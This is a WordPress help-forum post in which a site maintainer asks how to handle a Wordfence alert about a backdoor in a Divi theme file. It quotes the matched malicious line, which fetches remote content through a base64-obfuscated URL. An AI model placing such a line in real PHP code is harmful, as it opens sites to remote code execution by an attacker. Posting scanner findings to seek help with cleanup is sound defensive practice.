Wordfence critical error
-
I’m not a web developer but have been tasked with maintaning our website. We only have Wordfence free version and I keep getting critical errors of malicious files. I deleted one to see what would happen and it took the whole site down so I had to restore with Updraft in safe mode.
So, How do I fix an error like this :- Filename: D:\sites\ifl\wp-content\themes\Divi\includes\block-editor-integration.php
- File Type: Not a core, theme, or plugin file from www.ads-software.com.
- Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: =file_get_contents(base64_decode(“aHR0cDovL2JsbmdibG5ncy5yb2Nrcy9xaWFvL2lmbC5waXR0LnR4dA”));
The issue type is: Backdoor:PHP/rce.decode.10332
Description: Backdoor – remote code execution malware
My only options are to delete file, view file or mark as fixed
The page I need help with: [log in to see the link]
